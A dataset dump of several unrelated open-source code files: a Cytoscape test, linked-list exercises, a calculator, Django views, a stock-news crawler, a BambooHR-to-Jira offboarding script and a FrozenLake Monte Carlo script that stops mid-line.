_FROM_URL_BYTES)\n\n # Verify that a different file can overwrite it if we allow it\n res = import_file_from_url(_ALT_FROM_URL, _TEST_FILE)\n check_url_to_result(res, sandbox_path, _TEST_FILE, _ALT_FROM_URL_BYTES)\n\n # Get rid of the local test file if it already exists\n if os.path.exists(_TEST_FILE):\n os.remove(_TEST_FILE)\n\n # Verify that a file can be written to a directory nested in the sandbox, with path to be created during write\n nested_test_file = _NESTED_DIR + _TEST_FILE\n res = import_file_from_url(_FROM_URL, nested_test_file)\n check_url_to_result(res, sandbox_path, nested_test_file, _FROM_URL_BYTES)\n if os.path.exists(nested_test_file):\n os.remove(nested_test_file)\n\n # Verify that a file can be written to a directory nested in the sandbox, with path to be created during write\n escaped_test_file = _ESCAPE_DIR + _TEST_FILE\n res = import_file_from_url(_FROM_URL, escaped_test_file)\n check_url_to_result(res, sandbox_path, escaped_test_file, _FROM_URL_BYTES)\n if os.path.exists(escaped_test_file):\n os.remove(escaped_test_file)\n\n # Verify that trying to send a non-existent file fails\n self.assertRaises(Exception, import_file_from_url, source_url=_FROM_URL)\n self.assertRaises(CyError, import_file_from_url, source_url='totally bogus', dest_file=_TEST_FILE)\n self.assertRaises(CyError, import_file_from_url, source_url=None, dest_file=_TEST_FILE)\n self.assertRaises(CyError, import_file_from_url, source_url=' ', dest_file=_TEST_FILE)\n\n # Check sending to empty sandbox (Python kernel directory)\n default_sandbox_path = sandbox_set(None) # Should be py4cytoscape test directory\n self.assertTrue(os.path.samefile(default_sandbox_path, os.getcwd()))\n check_url_to_local_dir(default_sandbox_path)\n\n def _cybrowser_windows(self, operation='show'):\n\n def check_browser_list(browser_list, expected_list): # doesn't support duplicate ID keys\n browser = {b['id']: b for b in browser_list}\n expected = {b['id']: b for b in expected_list}\n self.assertEqual(len(browser), len(expected))\n for id, val in browser.items():\n self.assertIn(id, expected)\n self.assertEqual(val['title'], expected[id][operation]['title'])\n\n # Verify that the browser list starts out empty ... no browser windows displayed\n check_browser_list(cybrowser_list(), [])\n\n # Verify that a browser can be launched with all of its options\n self._check_show(operation, ToolsTests.BROWSER_HELLO)\n self._check_show(operation, ToolsTests.CYTOSCAPE_HOME_PAGE)\n self._check_show(operation, ToolsTests.CYTOSCAPE_MANUAL)\n\n # Verify that the browser list contains all of the new pages\n time.sleep(2) # wait for windowing system to catch up\n check_browser_list(cybrowser_list(),\n [ToolsTests.BROWSER_HELLO, ToolsTests.CYTOSCAPE_HOME_PAGE, ToolsTests.CYTOSCAPE_MANUAL])\n\n # Verify that adding the same pages doesn't change the browser list\n self._check_show(operation, ToolsTests.BROWSER_HELLO, skip_verify=True)\n self._check_show(operation, ToolsTests.BROWSER_HELLO, skip_verify=True)\n self._check_show(operation, ToolsTests.BROWSER_HELLO, skip_verify=True)\n time.sleep(2) # wait for windowing system to catch up\n check_browser_list(cybrowser_list(),\n [ToolsTests.BROWSER_HELLO, ToolsTests.CYTOSCAPE_HOME_PAGE, ToolsTests.CYTOSCAPE_MANUAL])\n\n # Verify that hiding a browser removes it from the browser list, and bogus browser windows don't cause error\n self.assertDictEqual(cybrowser_hide(ToolsTests.BROWSER_HELLO['id']), {})\n self.assertDictEqual(cybrowser_close(ToolsTests.CYTOSCAPE_HOME_PAGE['id']), {})\n time.sleep(2) # wait for windowing system to catch up\n check_browser_list(cybrowser_list(), [ToolsTests.CYTOSCAPE_MANUAL, ToolsTests.BROWSER_HELLO])\n\n # Verify that closing a browser twice does no harm\n self.assertDictEqual(cybrowser_close(ToolsTests.CYTOSCAPE_HOME_PAGE['id']), {})\n time.sleep(2) # wait for windowing system to catch up\n check_browser_list(cybrowser_list(), [ToolsTests.CYTOSCAPE_MANUAL, ToolsTests.BROWSER_HELLO])\n\n # Verify that closing the last browser window results in a clean browser list\n self.assertDictEqual(cybrowser_close(ToolsTests.BROWSER_HELLO['id']), {})\n self.assertDictEqual(cybrowser_close(ToolsTests.CYTOSCAPE_MANUAL['id']), {})\n time.sleep(2) # wait for windowing system to catch up\n check_browser_list(cybrowser_list(), [])\n\n def _check_show(self, operation, window_def, skip_verify=False):\n show_result = window_def[operation]['func'](window_def['id'], window_def[operation]['title'])\n self.assertIsInstance(show_result, dict)\n self.assertEqual(show_result['id'], window_def['id'])\n if not skip_verify: input('Verify that the \"' + window_def[operation]['title'] + '\" is visible; hit Enter')\n\nif __name__ == '__main__':\n unittest.main()\n","repo_name":"cytoscape/py4cytoscape","sub_path":"tests/test_tools.py","file_name":"test_tools.py","file_ext":"py","file_size_in_byte":23705,"program_lang":"python","lang":"en","doc_type":"code","stars":55,"dataset":"github-code","pt":"3"} +{"seq_id":"43371693869","text":"# from LinkedList import LinkedList\n\n# def nthToLast(ll,n):\n# pointer1 = ll.head\n# pointer2 = ll.head\n#\n# for i in range(n):\n# if pointer2 is None:\n# return None\n# pointer2 = pointer2.next\n# while pointer2:\n# pointer1 = pointer1.next\n# pointer2 = pointer2.next\n# return pointer1\n#\n# customLL=LinkedList()\n# customLL.generate(10,0,99)\n# print(customLL)\n# print(nthToLast(customLL,3))\n\n\n\n\n\n\n\n\n# #### PARTITION QN\n#\n#\n# def partition(ll,x):\n# curNode = ll.head\n# ll.tail = ll.head\n#\n# while curNode:\n# nextNode = curNode.next\n# curNode.next = None\n# if curNode.value < x:\n# curNode.next = ll.head\n# ll.head = curNode\n# else:\n# ll.tail.next = curNode\n# ll.tail = curNode\n# curNode = nextNode\n#\n# if ll.tail.next is not None:\n# ll.tail.next = None\n#\n# customLL = LinkedList()\n# customLL.generate(10,0,99)\n# print(customLL)\n# partition(customLL,10)\n# print(customLL)\n\n\n\n\n\n\n\n\n# #### SUM LINKED LISTS\n#\n#\n# def sumList(llA,llB):\n# n1 = llA.head\n# n2 = llB.head\n# carry = 0\n# ll = LinkedList()\n#\n# while n1 or n2 :\n# result = carry\n# if n1:\n# result += n1.value\n# n1 = n1.next\n# if n2:\n# result += n2.value\n# n2 = n2.next\n# ll.add(int(result % 10))\n# carry = result / 10\n#\n# return ll\n#\n# llA = LinkedList()\n# llA.add(7)\n# llA.add(1)\n# llA.add(6)\n#\n# llB = LinkedList()\n# llB.add(5)\n# llB.add(9)\n# llB.add(2)\n#\n# print(llA)\n# print(llB)\n# print(sumList(llA,llB))\n\n\n\n\n\n\n####### INTERSECTION\n\n\nfrom LinkedList import LinkedList,Node\ndef intersection(llA,llB):\n if llA.tail is not llB.tail:\n return False\n lenA = len(llA)\n lenB = len(llB)\n\n short = llA if lenA < lenB else llB\n long = llA if lenA > lenB else llB\n\n diff = len(long) - len(short)\n longNode = long.head\n shortNode = short.head\n\n for i in range(diff):\n longNode = longNode.next\n while shortNode is not longNode:\n shortNode = shortNode.next\n longNode = longNode.next\n return longNode\n\n#### helper func add method\ndef addSameNode(llA,llB,value):\n tempNode = Node(value)\n llA.tail.next = tempNode\n llA.tail = tempNode\n llB.tail.next = tempNode\n llB.tail = tempNode\n\nllA = LinkedList()\nllA.generate(3,0,10)\n\nllB = LinkedList()\nllB.generate(4,0,10)\n\naddSameNode(llA,llB,11)\naddSameNode(llA,llB,14)\n\nprint(llA)\nprint(llB)\n\nprint(intersection(llA,llB))","repo_name":"Gowtham-S01/python","sub_path":"newone/ReurnNthFromLast.py","file_name":"ReurnNthFromLast.py","file_ext":"py","file_size_in_byte":2566,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"41976318243","text":"if __name__ == '__main__':\n import sys, os\n \n nombre_archivos = os.listdir('ascii')\n\n for nombre_archivo in nombre_archivos:\n nombre_ascii = nombre_archivo[:-4]\n print(nombre_ascii)\n\n sys.exit()\n\nimport os\nfrom parametros import __ASCII__\n\nclass Ascii:\n def __init__(self, nombre, simbolo = '.'):\n self.nombre = nombre\n self.archivo = f'{self.nombre}.txt'\n self.simbolo = simbolo\n self.contenido = self.obtener_ascii()\n\n def obtener_ascii(self)-> list:\n asc = []\n with open(__ASCII__ + self.archivo) as f:\n lineas = f.readlines()\n for linea in lineas:\n asc.append(linea.rstrip())\n\n return asc\n\n\n def espaciar_ascii(self):\n ascii_nuevo = []\n for linea in ascii:\n linea_m = list(linea)\n if linea_m[0] == ' ':\n linea_m[0] = self.simbolo\n linea = ''.join(linea_m)\n ascii_nuevo.append(linea)\n \n self.ascii = ascii_nuevo\n\n\n @staticmethod\n def obtener_asciis() -> dict:\n '''\n Obtengo los asciis disponibles para el macro, en formato de diccionario\n {nombre_ascii => Ascii}\n '''\n asciis = dict()\n\n nombre_archivos = os.listdir(__ASCII__)\n\n for nombre_archivo in nombre_archivos:\n nombre_ascii = nombre_archivo[:-4]\n asc = Ascii(nombre_ascii)\n\n asciis[nombre_ascii] = asc\n\n return asciis","repo_name":"Jeremiah-PHP6/Jeremiah-PHP6","sub_path":"Lol spammer/entidades/asc.py","file_name":"asc.py","file_ext":"py","file_size_in_byte":1484,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"30304585786","text":"def suma(a, b):\n\treturn a + b\n\ndef resta(a, b):\n\treturn a - b\n\ndef multiplicacion(a, b):\n\treturn a * b\n\ndef division(a, b):\n if (b == 0):\n return print(\"No se puede dividir por cero!\")\n else:\n return a / b\n\ndef run():\n tipos = \"1) Sumar dos numeros \\n2) Restar dos numeros \\n3) Multiplicar dos numeros \\n4) Dividir dos numeros \\n5) Terminar\"\n opcion = int(input(\"\\n Seleccione el numero de la opcion a consultar: \\n{}:\\n\".format(tipos)))\n if opcion == 1: \n n1 = int(input(\"Digite el primer numero: \"))\n n2 = int(input(\"Digite el segundo numero: \"))\n print(\"El resultado de la suma es: \", suma(n1, n2))\n elif opcion == 2:\n n1 = int(input(\"Digite el primer numero: \"))\n n2 = int(input(\"Digite el segundo numero: \"))\n print(\"El resultado de la resta es: \", resta(n1, n2))\n elif opcion == 3:\n n1 = int(input(\"Digite el primer numero: \"))\n n2 = int(input(\"Digite el segundo numero: \"))\n print(\"El resultado de la multiplicacion es: \", multiplicacion(n1, n2))\n elif opcion == 4:\n n1 = int(input(\"Digite el primer numero: \"))\n n2 = int(input(\"Digite el segundo numero: \"))\n print(\"El resultado de la division es: \", division(n1, n2)) \n elif opcion == 5:\n exit()\n else:\n print(\"Opcion no valida, vuelva a digitar una opcion\")\n\n\ndef main():\n print(\"*** Calculadora basica ***\")\n run()\n \nif __name__ == \"__main__\":\n main()\n","repo_name":"devsantoss/CalculadoraFIS","sub_path":"calculadora/calculadora.py","file_name":"calculadora.py","file_ext":"py","file_size_in_byte":1489,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"1333847906","text":"from itertools import groupby\n\nfrom django.http import HttpResponse\nfrom django.shortcuts import render, redirect\nfrom django.urls import reverse\nfrom django.views.decorators.http import require_POST\n\nfrom apps.administration.models import ActionLog\nfrom apps.pilots.models import Scenery\nfrom zhuartcc.decorators import require_staff\n\n\ndef view_artcc_map(request):\n return render(request, 'artcc_map.html', {'page_title': 'ARTCC Map'})\n\n\ndef view_scenery(request):\n sceneries = Scenery.objects.all().order_by('simulator')\n scenery_sorted = {k: list(g) for k, g in groupby(sceneries, key=lambda scenery: scenery.get_simulator_display())}\n simulators = Scenery._meta.get_field('simulator').choices\n return render(request, 'scenery.html', {\n 'page_title': 'Scenery',\n 'sceneries': scenery_sorted,\n 'simulators': simulators\n })\n\n\n@require_staff\n@require_POST\ndef add_scenery(request):\n scenery = Scenery(\n name=request.POST.get('name'),\n simulator=request.POST.get('simulator'),\n link=request.POST.get('link'),\n payware=True if 'payware' in request.POST else False\n )\n scenery.save()\n\n ActionLog(action=f'Scenery \"{scenery.name}\" created by {request.user_obj}.').save()\n\n return redirect(reverse('scenery'))\n\n\n@require_staff\n@require_POST\ndef edit_scenery(request, scenery_id):\n scenery = Scenery.objects.get(id=scenery_id)\n scenery.name = request.POST.get('name')\n scenery.simulator = request.POST.get('simulator')\n scenery.link = request.POST.get('link')\n scenery.payware = True if 'payware' in request.POST else False\n scenery.save()\n\n ActionLog(action=f'Scenery \"{scenery.name}\" modified by {request.user_obj}.').save()\n\n return redirect(reverse('scenery'))\n\n\n@require_staff\n@require_POST\ndef delete_scenery(request, scenery_id):\n scenery = Scenery.objects.get(id=scenery_id)\n\n ActionLog(action=f'Scenery \"{scenery.name}\" deleted by {request.user_obj}.').save()\n\n scenery.delete()\n\n return HttpResponse(status=200)\n","repo_name":"Houston-ARTCC/zhuartcc.org","sub_path":"apps/pilots/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2034,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"3"} +{"seq_id":"42111038662","text":"\"\"\"container-loading-problem - constants.py\n---- AUTHOR: Ivan STEPANIAN (iv-stpn )\n---- ROLE: Defines the global constants the program uses\n\"\"\"\n\nfrom itertools import permutations\n\n# Number of dimensions for the coordinate system used throughout the code base.\nDIMS = 3\n\n# Possible permutations of the coordinates of a rectangular prism.\n# Maps coordinates (0, 1, 2) = (x, y z) to the corresponding permutation.\n# (e.g PERUMATIONS[2] = (1, 0, 2) <=> (0, 1, 2) => (1, 0, 2) <=> (x, y, z) => (y, x, z) rotation)\nPERMUTATIONS = tuple(permutations(range(DIMS)))\n\n# Where to place the first package during the Three Corners Heuristic algorithm\n# Initially set to (0, 0, 0)\nINIT_COORDS = tuple(0 for _ in range(DIMS))\n\n# Limit of the number of types of packages that can be placed in the container\n# Limits the number of permutations of the package types (10 types => 10! = 3628800 possibilities)\nTYPE_LIMIT = 10\n\n# Regions of the container where packages cannot be placed, list of (min_coords, max_coords) pairs\nCONSTRAINTS = [\n ((0, 0, 254), (16.5, 9, 268.5)),\n ((0, 224.5, 254), (16.5, 233.5, 268.5)),\n]\n","repo_name":"iv-stpn/container-loading-problem","sub_path":"constants.py","file_name":"constants.py","file_ext":"py","file_size_in_byte":1126,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"29615348511","text":"# -*- coding: utf-8 -*-\n# @Author: LQS\n# @Date: 2021-07-18 15:49:28\n# @Last Modified by: LQS\n# @Last Modified time: 2021-08-05 21:12:57\nimport requests, re, datetime\nfrom bs4 import BeautifulSoup\nfrom pymongo import MongoClient\nfrom textProcessing.processingArticle import processArticle as pA\n\nimport gevent\nfrom gevent import monkey\nmonkey.patch_all()\nclass jrjStockCrawler(object):\n '''\n # Arguments:\n totalPages: Number of pages set to be crawled.\n Range: Divide total web pages into totalPages/Range parts \n for multi-threading processing.\n ThreadsNum: Number of threads needed to be start.\n dbName: Name of database.\n colName: Name of collection.\n IP: Local IP address.\n PORT: Port number corresponding to IP address.\n '''\n def __init__(self, *arg, **kwarg):\n super(jrjStockCrawler, self).__init__()\n self.startDate = arg[0]\n self.endDate = arg[1]\n self.Range = arg[2]\n self.ThreadsNum = kwarg['ThreadsNum']\n self.IP = kwarg['IP']\n self.PORT = kwarg['PORT']\n self.dbName = kwarg['dbName']\n self.colName = kwarg['_collectionName']\n\n def ConnDB(self):\n '''\n Connect to mongodb datebase\n '''\n #创建游标,指定数据库,最后指定集合\n Client = MongoClient(self.IP, self.PORT)\n db = Client[self.dbName]\n self._collection = db[self.colName]\n\n def extractDate(self, tagList:list)->list:\n '''Extract column date(the tag in tagList) into a list'''\n data = []\n for tag in tagList:\n res = self._collection.distinct(str(tag))\n data.append(res)\n return data\n\n def getEveryDay(self, startDate:str, endDate:str)->list:\n dateList = []\n dateFormat = '%Y-%m-%d'\n startDate = datetime.datetime.strptime(startDate, dateFormat)\n endDate = datetime.datetime.strptime(endDate, dateFormat)\n while startDate <= endDate:\n dateList.append(startDate.strftime(dateFormat))\n startDate += datetime.timedelta(days = 1)\n return dateList\n\n def getDateList(self)->list:\n '''\n Divide date list into parts using 'self.Range' parameter.\n '''\n dateList = self.getEveryDay(self.startDate, self.endDate)\n dateNums = len(dateList)\n k = 0\n dateRangeList = []\n\n while k < dateNums:\n if k + self.Range >= dateNums:\n break\n else:\n dateRangeList.append(dateList[k:k+self.Range])\n k += self.Range\n dateRangeList.append(dateList[k:])\n return dateRangeList\n\n def findPageNums(self, url:str, date:str)-> int:\n '''Find the number of web pages of specific date.\n '''\n resp = requests.get(url)\n bs = BeautifulSoup(resp.text, 'lxml')\n pages = 1\n a_list = bs.find_all('a', href=re.compile(date.replace('-', '')+'_'), target='_self', text=True)\n if a_list:\n pages = len(a_list)\n return pages\n\n\n\n def getUrlInfo_fromjrj(self, url:str, date_specific:str):\n '''get date and article from a specific web.\n '''\n resp = requests.get(url)\n bs = BeautifulSoup(resp.text, 'lxml')\n date = ''\n article = ''\n #notFoundPage = False\n #start get special date from a special website\n spans = bs.find_all('span')\n for span in spans:\n for child in span.children:\n if child == 'jrj_final_date_start':\n date = span.text.replace('\\r', '').replace('\\n', '')\n break\n if date:\n break\n if not date:\n date = date_specific\n\n #start get article\n article_bs = bs.find('div', class_='texttit_m1')\n if article_bs:\n article = pA.processArticle().jrj_own(article_bs.text)\n \n return (date, article)\n\n def getCompNews_jrj(self, dateList:list):\n '''\n Crawl company news form target web\n (http://stock.jrj.com.cn/xwk/)\n '''\n self.ConnDB()\n AddressList = self.extractDate(['Address'])[0]\n if not AddressList:\n url_body = 'http://stock.jrj.com.cn/xwk/'\n url_diffPages = '_1.shtml'\n urls_date = []\n\n for date in dateList:\n url_complete = url_body + date.replace('-', '')[0:6] +\\\n '/' + date.replace('-', '') + url_diffPages\n pageNums = self.findPageNums(url_complete, date)\n for page in range(1, pageNums+1):\n url_sheet_cur = url_body + date.replace('-', '')[0:6] +\\\n '/'+ date.replace('-', '') + '_{}.shtml'.format(page)\n '''\n url_sheet_cur = urls_date.append(url_body + date.replace('-', '')[0:6] +\\\n '/'+ date.replace('-', '') + '_{}.shtml'.format(page))\n '''\n urls_date.append((url_sheet_cur, date))\n\n for (url_specific, date_specific) in urls_date:\n print('ready to get Info from [{0}], the data is *{1}*'.format(url_specific, date_specific))\n resp = requests.get(url_specific)\n bs = BeautifulSoup(resp.text, 'lxml')\n a_list = bs.find_all('a', href=re.compile(r'http://stock\\.jrj\\.com\\.cn.*?(shtml)$'), text=True, target=None)\n for a in a_list:\n (date, article)= self.getUrlInfo_fromjrj(a['href'], date_specific)\n if article:\n data = {'Date': date,\n 'Address': a['href'],\n 'Title': a.text,\n 'Articel': article}\n self._collection.insert_one(data)\n else:\n url_body = 'http://stock.jrj.com.cn/xwk/'\n url_diffPages = '_1.shtml'\n urls_date = []\n\n for date in dateList:\n url_complete = url_body + date.replace('-', '')[0:6] +\\\n '/' + date.replace('-', '') + url_diffPages\n pageNums = self.findPageNums(url_complete, date)\n for page in range(1, pageNums+1):\n url_sheet_cur = urls_date.append(url_body + date.replace('-', '')[0:6] +\\\n '/'+ date.replace('-', '') + '_{}.shtml'.format(page))\n urls_date.append((url_sheet_cur, date))\n\n for url_specific, date_specific in urls_date:\n print('ready to get Info from [{0}], the data is *{1}*'.format(url_specific, date_specific))\n resp = requests.get(url_specific)\n bs = BeautifulSoup(resp.text, 'lxml')\n a_list = bs.find_all('a', href=re.compile(r'http://stock\\.jrj\\.com\\.cn.*?(shtml)$'), text=True, target=None)\n for a in a_list:\n if a['href'] not in AddressList:\n (date, article)= self.getUrlInfo_fromjrj(a['href'], date_specific)\n if article:\n data = {'Date': date,\n 'Address': a['href'],\n 'Title': a.text,\n 'Articel': article}\n self._collection.insert_one(data)\n\n def getCmpNews_jrjToday(self):\n today = datetime.date.today()\n today = datetime.date.strftime(today, '%Y-%m-%d')\n self.getCompNews_jrj([today])\n\n def coroutine_run(self):\n '''\n Coroutines running\n '''\n jobs = []\n dateLists = self.getDateList()\n for dateList in dateLists:\n jobs.appennd(gevent.spawn(self.getCompNews_jrj, dateList))\n gevent.joinall(jobs)","repo_name":"miyagipipi/StockNewsCrawler","sub_path":"Crawlers/crawler_jrj.py","file_name":"crawler_jrj.py","file_ext":"py","file_size_in_byte":7871,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"27765411394","text":"import requests\nimport json\nfrom dotenv import load_dotenv\nfrom datetime import datetime, timedelta\nimport os\nload_dotenv()\n\n# Set up BambooHR API request parameters\nbamboo_api_key = os.getenv('BAMBOO_API_KEY')\nbamboo_subdomain = os.getenv('BAMBOO_SUBDOMAIN')\n\nprint(f'OS {os.getenv(\"BAMBOO_SUBDOMAIN\")}')\n# Set up API endpoint and API key\nendpoint = f'https://api.bamboohr.com/api/gateway.php/{bamboo_subdomain}/v1/'\n\n# Set up query parameters to retrieve data for new employees added since a certain date\n# Replace \"YYYY-MM-DD\" with actual date\nsince = '2023-01-01'\n\n# Set up Jira Service Desk API request parameters\njira_api_token = os.getenv('JIRA_API_TOKEN')\njira_url = os.getenv('JIRA_URL')\njira_customer_id = os.getenv('JIRA_CUSTOMER_ID') # ID of the Jira Service Desk customer who should be added to the request\nserviceDeskId = 2 # ID od the Jira Service Desk project\n\nparams = {'projectKey': 'EX', 'requestTypeId': 30, 'serviceDeskId': 2}\nheaders = {'Accept': 'application/json', 'Content-Type': 'application/json', 'Authorization': f'Basic {os.getenv(\"BAMBOO_AUTHORIZATION\")}'}\n\n#query_params = {'since': '2021-01-01', type: 'inserted'}\n\ndef setOffboardingDate(last_working_day):\n # Parse the string to a date\n date_string = last_working_day\n date = datetime.strptime(date_string, \"%Y-%m-%d\").date()\n\n # Increment the date by 1 day\n new_date = date + timedelta(days=1)\n\n # Print the new date in ISO format\n return new_date.isoformat()\n\n# Make API request to retrieve data for all employees that are recently terminated\ndef fetch_all_new_employees(since):\n date_since_last_sync = since\n url = endpoint + f'employees/changed?since={date_since_last_sync}T00%3A00%3A00-07%3A00&type=updated'\n response = requests.get(url, headers=headers)\n print(f'URL is {url}')\n print(f'Header is {headers}')\n data = response.json()\n\n #print(f'Recently terminated employees ${data}')\n\n employees = json.loads(response.content)['employees']\n\n # Loop through employee directory for newly created employees \n for key, value in employees.items():\n employee_id = key\n employee_details_url = endpoint + f\"employees/{employee_id}/?fields=firstName%2ClastName%2CjobTitle%2CbestEmail%2ChireDate%2CjobTitle%2CemploymentHistoryStatus%2CterminationDate%2Csupervisor%2CterminationDate%2Cstatus%2Clocation%2Cdepartment&onlyCurrent=true\"\n\n # Fetch Employee Details\n employee_details_response = requests.get(employee_details_url, headers=headers)\n\n # Parse the response to json. \n employee_details_data = employee_details_response.json()\n #print(employee_details_data)\n if employee_details_data[\"employmentHistoryStatus\"] == \"Terminated\" and employee_details_data[\"terminationDate\"] !=\"\":\n #print(employee_details_data[\"terminationDate\"])\n create_jira_onboarding_request(employee_details_data)\n\n #return(employee_details_data)\n\n# Loop through employee data and create Jira Service Desk customer requests\ndef create_jira_onboarding_request(employee_details_data):\n\n #for key, value in employee_details_data.items():\n # Construct Jira Service Desk API request payload\n payload = {\n# Kelechi to please be offboarded on 12 Dec\n 'serviceDeskId': params['serviceDeskId'],\n 'requestTypeId': params['requestTypeId'],\n 'requestFieldValues': {'summary': f'{employee_details_data[\"firstName\"]} {employee_details_data[\"lastName\"]} to be offboarded on {setOffboardingDate(employee_details_data[\"terminationDate\"])}',\n 'description': f'Email: {employee_details_data[\"bestEmail\"]}\\nDepartment: {employee_details_data[\"department\"]}\\nJob Title: {employee_details_data[\"jobTitle\"]}\\nLast Working Date: {setOffboardingDate(employee_details_data[\"terminationDate\"])}\\nManager: {employee_details_data[\"supervisor\"]}\\nLocation: {employee_details_data[\"location\"]}'\n }\n #'requestParticipants': [{'id': jira_customer_id}] \n }\n\n # Send Jira Service Desk API request to create new customer request\n headers = {'Accept': 'application/json', 'Content-Type': 'application/json', 'Authorization': f'Basic {os.getenv(\"JIRA_AUTHORIZATION\")}'}\n \n print(f'final jira url = {jira_url}')\n print(f'headers are: {headers}')\n\n response = requests.post(f'{jira_url}', headers=headers, json=payload)\n if response.status_code == 201:\n print(f'Customer request created for {employee_details_data[\"firstName\"]} {employee_details_data[\"lastName\"]}')\n else:\n print(f'Error creating customer request for {employee_details_data[\"firstName\"]} {employee_details_data[\"lastName\"]}: {response.content}')\n\n\n# Call the fetch_all_new_employees method passing in a last since sync date.\nget_new_employees = fetch_all_new_employees('2023-03-10')\n","repo_name":"AdeoluAdeyemi/bamboohr-jira-integration","sub_path":"offboard_ex_employee_jira_request.py","file_name":"offboard_ex_employee_jira_request.py","file_ext":"py","file_size_in_byte":4813,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"71344692880","text":"# Taken from : https://github.com/Urinx/ReinforcementLearning/blob/master/QLearning/QLearning_FrozenLake.py\n\nimport numpy as np\nimport gym\nimport random\nfrom pathlib import Path\nimport datetime\nimport time\nimport pickle\n\nfrom gym.envs.toy_text.frozen_lake import generate_random_map\n\n\"\"\"LOGGING\"\"\"\ntimestamp = int(time.time())\ntimestr = str(datetime.datetime.now().strftime('%Y-%m-%d_%H-%M'))\nexperiment_dir = Path('./data/')\nexperiment_dir.mkdir(exist_ok=True)\nexperiment_dir = experiment_dir.joinpath('MC/')\nexperiment_dir.mkdir(exist_ok=True)\nexperiment_dir = experiment_dir.joinpath(str(timestamp))\nexperiment_dir.mkdir(exist_ok=True)\n\n\"\"\"ENVIRONMENT\"\"\"\n\nDEFAULT = True # True for Default settings; False for custom map and custom size\nMAP_LOAD_BOOL = False\n\n# env = gym.make('FrozenLake-v1',is_slippery=False, \n# desc=generate_random_map(size=10),render_mode=\"human\" )\nif MAP_LOAD_BOOL == False:\n\n\n SIZE = 4\n\n if (DEFAULT == False) or (SIZE != 4) :\n map_desc=generate_random_map(size=SIZE)\n env = gym.make('FrozenLake-v1',\n is_slippery=False, \n desc=map_desc)\n with open(str(experiment_dir)+'\\\\map_desc.pickle','wb') as h:\n pickle.dump(map_desc,h)\n\n else:\n env = gym.make('FrozenLake-v1',\n is_slippery=False)\n # render_mode=\"human\" )\nelse:\n try:\n MAP_LOAD_DIR = 'data/QL/timestamp/map_desc.pickle'\n with open(MAP_LOAD_DIR, 'rb') as f:\n map_desc = pickle.load(f)\n except:\n print(\"Fail to load from saved map directory. Check directory given\")\n exit()\n\ndef find_duplicates(sequence):\n duplicates = {}\n for i, state_action in enumerate(sequence):\n key = str(state_action)\n if key in duplicates:\n duplicates[key].append(i)\n else:\n duplicates[key] = [i]\n return duplicates\n\n\n\ndef possible_actions(state):\n action_list = [0,1,2,3]\n if state in NOLEFT:\n action_list.remove(0)\n if state in NODOWN:\n action_list.remove(1)\n if state in NORIGHT:\n action_list.remove(2)\n if state in NOUP:\n action_list.remove(3)\n return action_list\n\n\naction_size = env.action_space.n\nstate_size = env.observation_space.n\nrtable = np.zeros((state_size, action_size)) # Returns table\nqtable = np.zeros((state_size, action_size))\nntable = np.zeros((state_size, action_size)) # For bookkeeping only\n\nrtable = [[[] for i in range(action_size)] for j in range(state_size)]\n\nNOUP = [i for i in range(SIZE)]\nNODOWN = [state_size-1-i for i in range(SIZE)]\nNOLEFT = [i*SIZE for i in range(SIZE)]\nNORIGHT = [i*SIZE + SIZE for i in range(SIZE)]\n\n\ntotal_episodes = 10000 # 1000\nsave_interval = total_episodes//20\nlearning_rate = 0.8\nmax_steps = 99\ngamma = 0.95\n\nglobal win, loss, timeout\nwin,loss,timeout = 0,0,0\n\n# # Exponential Decay of epsilon\nepsilon = 1.0\nmax_epsilon = 1.0\nmin_epsilon = 0.005\ndecay_rate = 0.001\n\nresults_array = []\n# Fixed P(Exploration) = epsilon Method\n# epsilon = 0.01\nwith open(str(experiment_dir)+'\\\\results.txt', 'w') as f:\n f.write(f\"Method: MonteCarlo \\n\")\n f.write(f\"------------------Parameters------------------\\n\")\n f.write(f\"Size: {SIZE} Learning Rate: {learning_rate} Gamma: {gamma}\\n\")\n f.write(f\"Epsi_Init: {epsilon} Epsi_Max: {max_epsilon} \\n\")\n f.write(f\"Epsi_Min: {min_epsilon} Decay: {decay_rate}\\n\")\n f.write(f\"Start Time: {timestr} \\n\")\n\nrewards = []\nfor episode in range(total_episodes):\n statestate = env.reset()\n state = statestate[0]\n total_rewards = 0\n\n sa_seq = []\n\n env.render()\n action_list = possible_actions(state)\n # action = env.action_space.sample()\n action = np.random.choice(action_list)\n\n # for step in range(max_steps):\n # For infinite runtime in MC method\n step = 0\n done = False\n while not done:\n step += 1\n new_state, reward, done, truncated, info = env.step(action) \n\n # print(f\"Epsiode {episode}, Step {step}\")\n # print(f\"state at {state}\")\n\n sa_seq.append((state, action, reward))\n exp_exp_tradeoff = random.uniform(0, 1)\n\n state = new_state\n total_rewards += reward\n ntable[state,action] += 1\n\n if exp_exp_tradeoff > epsilon:\n # action = np.argmax(qtable[state])\n try:\n action_list = possible_actions(state) \n row = list(qtable[state])\n goodq = []\n for i in action_list:\n goodq.append(row[i])\n\n max_value = np.max(goodq)\n max_indices = np.where(row == max_value)[0]\n if len(max_indices) == 1:\n action = max_indices[0]\n else:\n # if there are multiple maximum indices, choose one randomly\n action = np.random.choice(max_indices)\n except:\n action = np.argmax(qtable[state])\n\n else:\n action_list = possible_actions(state)\n # action = env.action_space.sample()\n action = np.random.choice(action_list)\n\n # action = input(\"Action Here: \")\n\n # for i in range(4):\n # print(env.action_space.sample())\n # env.render()\n\n # action = int(action)\n # sa_seq.append((state,action))\n # print(f\"state at {state}\")\n # print(f'action at {action}')\n\n\n\n # print(epsilon)\n\n if done: \n if reward == 1:\n win += 1\n elif reward == -1:\n loss += 1\n else:\n pass\n\n break\n \n # print(\"Episode Simulated\")\n # print(sa_seq)\n\n # # ChatGPT\n # returns = {}\n # g = 0\n # for t in reversed(range(len(sa_seq))):\n # state, action, reward = sa_seq[t]\n # g = gamma * g + reward\n # if (state, action) not 